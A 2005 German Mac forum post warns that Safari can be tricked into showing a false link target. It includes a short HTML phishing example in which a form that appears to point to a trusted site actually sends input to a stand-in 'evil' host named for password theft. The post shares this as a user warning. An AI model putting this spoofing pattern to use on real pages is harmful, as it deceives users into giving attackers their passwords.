Safari bietet unsichere Links

bashir

bashir

Mitglied
Thread Starter
Dabei seit
02.01.2005
Beiträge
51
Reaktionspunkte
1
Hi Forum!

Ich weiß nicht, ob es hier schon diskutiert wurde (Suche ergab nichts), aber trotz frischem Sicherheits-Update ist es immer noch möglich, dem Safari-Surfer einen falschen link unterzujubeln:

http://fukami.vakuum.net/archives/2005/11/25/phishing-leicht-gemacht-unter-mac-os-x/

Eigentlich ziemlich einfach.
Dem Image einen falschen Titel zu geben, ist ja noch ziemlich banal, aber dass man ihm auch noch "pro forma" einen falschen link zuweisen kann....

Hier das html Beispiel:

HTML:
<form action="http://www.boese.com/gib-mir-dein-pw">
<a href="http://www.gut.com/sichere-pw-eingabe"><input type="image" src="http://www.gut.com/logo.gif" title="http://www.gut.com/sichere-pw-eingabe"></a>
</form>

Also, immer schön nochmal die homepage überprüfen... ;-)

Gruß

bashir
 
Zurück
Oben Unten